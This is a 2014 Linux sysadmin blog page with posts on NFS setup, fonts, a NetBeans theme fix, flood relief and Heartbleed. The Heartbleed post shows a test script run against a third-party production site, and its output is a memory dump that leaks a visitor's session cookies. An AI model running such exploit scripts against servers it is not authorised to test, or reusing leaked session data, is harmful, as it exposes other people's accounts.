Skip to content

100% true…

Bs5TSJ7CIAAu0Gt

Posted in Humor.

No comments

By Marinko Tarlac July 20, 2014

CentOS server – NFS client/server howto

NFS stands for Network File System and through NFS, a client can read and/or write a remote share on an NFS server (like on local hard disk)

The first step to set up NFS client/server is to install nfs-utils and nfs-utils-lib packages on both systems (server and client)

yum install nfs-utils nfs-utils-lib
chkconfig --levels 235 nfs on 
service nfs start

For example, the server IP is 10.0.0.1 and the client 10.0.0.2.

I’d like to use /test and /var/test directories from the client system. To make them accessible we must “export” them on the server.

From the client system, the NFS share is usually accessed as the user “nobody”. If the directory isn’t owned by nobody, the read/write access from NFS client should be made as root.
In this howto, the /test dir will be used as root while the /var/test will be used as “nobody”. If /var/test directory doesn’t exist, create the dir and change the ownership to the user/group 65534 (nonexistant user/group).

mkdir /var/test
chown 65534:65534 /var/test

The next step (on the server side) is to modify /etc/exports

nano /etc/exports

and add the next lines

/test           10.0.0.2(rw,sync,no_root_squash,no_subtree_check)
/var/test        10.0.0.2(rw,sync,no_subtree_check)

The no_root_squash parameter means access dir as root (all files copied/created from client will be owned by root).

After you modify /etc/exports, run exportfs -a to make the changes effective.

exportfs -a

The next step (on the client side) is to create the directories where you want to mount the NFS shares

mkdir -p /mnt/test
mkdir -p /mnt/var/test

Mount NFS shares with

mount 10.0.0.1:/test /mnt/test
mount 10.0.0.1:/var/test /mnt/var/test

Verify the settings with:

df -h

The result should be something like

[root@client ~]# df -h
Filesystem            Size  Used Avail Use% Mounted on
....
10.0.0.1:/test    100G  25G   75G  25% /mnt/test
10.0.0.1:/var/test
                       100G  25G   75G  25% /mnt/var/test

and

mount

The result should be something like

[root@client ~]# mount
....
10.0.0.1:/test on /mnt/test type nfs (rw,addr=10.0.0.1)
10.0.0.1:/var/test on /mnt/var/test type nfs (rw,addr=10.0.0.1)

To mount the NFS shares at boot time, add the next lines in /etc/fstab file

10.0.0.1:/test  /mnt/test   nfs      rw,sync,hard,intr  0     0
10.0.0.1:/var/test  /mnt/var/test   nfs      rw,sync,hard,intr  0     0

Don’t forget to check the settings after reboot

Posted in CentOS, Other, Server project, Tips & Tricks.

No comments

By Marinko Tarlac June 28, 2014

DAY AFTER DISASTER

Posted in Other.

No comments

By Marinko Tarlac May 31, 2014

TrueType fonts under Debian

If you’re coming from Windows you’ll probably notice the “difference” between the fonts on Linux and Windows. You probably don’t have true type fonts installed which are commonly used on Windows based systems. They are also known as as “Windows Fonts” or “DejaVu fonts”.

You can easily install the true type fonts under Debian Linux:

# sudo apt-get install ttf-mscorefonts-installer

For Debian Lenny and later versions, free alternatives for the common Microsoft fonts Arial, Courier and Times New Roman are available in ttf-liberation package. You can install this package with:

# sudo apt-get install ttf-liberation

Logout from your current session and login again to reload the fonts.

Posted in Mint Linux.

No comments

By Marinko Tarlac May 23, 2014

Mint Linux Cinnamon – Invisible menu text on Netbeans

I noticed one bug with Mint Linux (Cinnamon) and Netbeans menu items that have an ‘active’ state which are completely invisible. Actually the text and the background colors are the same.

Mint 14 Nadia Cinnamon and later versions are affected (LMDE also) with NetBeans 7.3 and later.

uiissueinvisiblemenutext_585

The problem lies in the Mint-X GTK theme. To fix this problem, you need to modify /usr/share/themes/Mint-X/gtk-2.0/Styles/menu.rc file and lines

fg[ACTIVE] = @selected_fg_color

should be replaced with:

fg[ACTIVE] = @menu_fg_color

There are two lines (in style “menu” and style “menubar”)

Source: http://forums.netbeans.org/topic57068.html

Posted in Programming, Tips & Tricks.

2 comments

By Marinko Tarlac May 23, 2014

Support Bosnia and Serbia

Serbia, Bosnia and Herzegovina, and Croatia have experienced floods of Biblical proportions since last week, the worst that the region has known since they began keeping records 120 years ago.
In Bosnia, more than 1 million people live in the affected areas and my city was affected too (Banja Luka, Republic of Srpska).

Now you know the reason why this blog was offline… The water was 10m from our servers…

Now we’re working together with our friends and we’re trying to rebuild our country. I never asked for donations but now I will

Please support this blog by donating to my country. I don’t need anything but near one million people do.

Donate by PayPal to Representative Office of the Republic of Srpska in Brussels PayPal account.

The link for more information http://floodrelief.vladars.net/

Obrenovac-2014-535x300

Posted in Other.

No comments

By Marinko Tarlac May 22, 2014

Partition X does not start on physical sector boundary

If you run “fdisk -l” and you get something like:

[root@ftp ~]# fdisk -l
 
....
 
Disk /dev/sdb: 1000.2 GB, 1000204886016 bytes
255 heads, 63 sectors/track, 121601 cylinders
Units = cylinders of 16065 * 512 = 8225280 bytes
Sector size (logical/physical): 512 bytes / 4096 bytes
I/O size (minimum/optimal): 4096 bytes / 4096 bytes
Disk identifier: 0xec2af3f7
 
   Device Boot      Start         End      Blocks   Id  System
/dev/sdb1               1      121601   976760001   83  Linux
Partition 1 does not start on physical sector boundary.

you’ll notice the message: “Partition 1 does not start on physical sector boundary

What is the cause and do I need to fix it? If so, how?

Continued…

Posted in Tips & Tricks.

No comments

By Marinko Tarlac May 9, 2014

GitLab on CentOS – server certificate verification failed

If you followed this recipe to install GitLab on CentOS, you may have some problems

Continued…

Posted in Programming, Tips & Tricks.

1 comment

By Marinko Tarlac April 22, 2014

Fix OpenSSL bug – my way

Fix OpenSSL bug – my way

On 04/11/2014 06:02 PM, Marinko Tarlać via PayPal wrote:
> PayPal <https://www.paypal.com/us>
>
> Hello OpenSSL Software Foundation,
>
> This email confirms that you have received a donation of $xxxxx USD from
> Marinko Tarlać(mtarlac@xxxxx <mailto:mtarlac@xxxxx>). ...
 
We received your donation of US$xxxxx. Thank you for your support of
the OpenSSL project!
 
-Steve M.
 
-- Steve Marquess OpenSSL Software Foundation

Posted in Other.

No comments

By Marinko Tarlac April 12, 2014

Heart Bleed Bug – OpenSSL – part 2

I maintain more than 30 servers and several of them was affected with Heartbleed bug. CentOS released update for OpenSSL package(s) so there are no excuses not to update (yum update openssl, … ).

In the meantime, there are hundreds of sysadmins which still didn’t do anything to protect their servers and clients (https://gist.github.com/dberkholz/10169691).

Testing REMOVED.com for example:

boky@bojler ~/Downloads $ ./test.py REMOVED.com
Connecting...
Sending Client Hello...
Waiting for Server Hello...
 ... received message: type = 22, ver = 0302, length = 58
 ... received message: type = 22, ver = 0302, length = 4837
 ... received message: type = 22, ver = 0302, length = 4
Sending heartbeat request...
 ... received message: type = 24, ver = 0302, length = 16384
Received heartbeat response:
  0000: 02 40 00 D8 03 02 53 43 5B 90 9D 9B 72 0B BC 0C  .@....SC[...r...
  0010: BC 2B 92 A8 48 97 CF BD 39 04 CC 16 0A 85 03 90  .+..H...9.......
  0020: 9F 77 04 33 D4 DE 00 00 66 C0 14 C0 0A C0 22 C0  .w.3....f.....".
  0030: 21 00 39 00 38 00 88 00 87 C0 0F C0 05 00 35 00  !.9.8.........5.
  0040: 84 C0 12 C0 08 C0 1C C0 1B 00 16 00 13 C0 0D C0  ................
  0050: 03 00 0A C0 13 C0 09 C0 1F C0 1E 00 33 00 32 00  ............3.2.
  0060: 9A 00 99 00 45 00 44 C0 0E C0 04 00 2F 00 96 00  ....E.D...../...
  0070: 41 C0 11 C0 07 C0 0C C0 02 00 05 00 04 00 15 00  A...............
  0080: 12 00 09 00 14 00 11 00 08 00 06 00 03 00 FF 01  ................
  0090: 00 00 49 00 0B 00 04 03 00 01 02 00 0A 00 34 00  ..I...........4.
  00a0: 32 00 0E 00 0D 00 19 00 0B 00 0C 00 18 00 09 00  2...............
  00b0: 0A 00 16 00 17 00 08 00 06 00 07 00 14 00 15 00  ................
  00c0: 04 00 05 00 12 00 13 00 01 00 02 00 03 00 0F 00  ................
  00d0: 10 00 11 00 23 00 00 00 0F 00 01 01 67 3A 20 67  ....#.......g: g
  00e0: 7A 69 70 2C 20 64 65 66 6C 61 74 65 0D 0A 52 65  zip, deflate..Re
  00f0: 66 65 72 65 72 3A 20 68 74 74 70 73 3A 2F 2F 77  ferer: https://w
  0100: 77 77 2E 74 6F 73 68 69 62 61 2E 63 6F 6D 2F 74  ww.REMOVED.com/t
  0110: 69 63 2F 70 72 6F 64 75 63 74 2F 76 32 30 30 30  ic/product/v2000
  0120: 2D 73 65 72 69 65 73 2D 73 6D 61 6C 6C 2D 70 6C  -series-small-pl
  0130: 63 73 0D 0A 43 6F 6F 6B 69 65 3A 20 4A 53 45 53  cs..Cookie: JSES
  0140: 53 49 4F 4E 49 44 3D 44 39 37 36 34 38 30 32 30  SIONID=D97648020
  0150: 41 45 36 32 31 46 45 41 31 44 38 45 30 37 33 42  AE621FEA1D8E073B
  0160: 42 38 31 44 44 32 36 2E 74 61 3B 20 63 69 74 72  B81DD26.ta; citr
  0170: 69 78 5F 6E 73 5F 69 64 3D 62 35 53 33 58 6A 6B  ix_ns_id=b5S3Xjk
  0180: 4A 49 59 4B 53 31 6E 42 2F 31 45 73 4B 6C 58 46  JIYKS1nB/1EsKlXF
  0190: 6D 70 71 45 41 30 30 30 0D 0A 43 6F 6E 6E 65 63  mpqEA000..Connec
  01a0: 74 69 6F 6E 3A 20 6B 65 65 70 2D 61 6C 69 76 65  tion: keep-alive
  01b0: 0D 0A 49 66 2D 4D 6F 64 69 66 69 65 64 2D 53 69  ..If-Modified-Si
  01c0: 6E 63 65 3A 20 54 75 65 2C 20 30 35 20 4E 6F 76  nce: Tue, 05 Nov
  01d0: 20 32 30 31 33 20 31 34 3A 32 30 3A 33 34 20 47   2013 14:20:34 G
  01e0: 4D 54 0D 0A 0D 0A 69 65 1F 0E 88 65 6C 48 9C E1  MT....ie...elH..
  01f0: 7C 8F FD AC 1C 93 A1 A8 7E 9F 00 00 00 00 00 00  |.......~.......
  0200: 0D 0A 49 66 2D 4E 6F 6E 65 2D 4D 61 74 63 68 3A  ..If-None-Match:
  0210: 20 22 31 61 66 38 36 31 2D 37 34 2D 34 64 66 32   "1af861-74-4df2
  0220: 32 34 31 34 38 39 33 30 30 22 0D 0A 0D 0A 4E 1A  241489300"....N.
....
  3fc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  3fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  3fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  3ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
 
WARNING: server returned more data than it should - server is vulnerable!

For security reasons, real domain which I tested is replaced with “REMOVED”

Some hosts from the list I posted above are already patched (which is good)

boky@bojler ~/Downloads $ ./test.py zoho.com
Connecting...
Sending Client Hello...
Waiting for Server Hello...
 ... received message: type = 22, ver = 0302, length = 66
 ... received message: type = 22, ver = 0302, length = 2399
 ... received message: type = 22, ver = 0302, length = 331
 ... received message: type = 22, ver = 0302, length = 4
Sending heartbeat request...
Unexpected EOF receiving record header - server closed connection
No heartbeat response received, server likely not vulnerable

Throwing rocks to OpenSSL developers is not the good idea. Donating money for paid developers is much better option…

Posted in Linux, Other.

No comments

By Marinko Tarlac April 9, 2014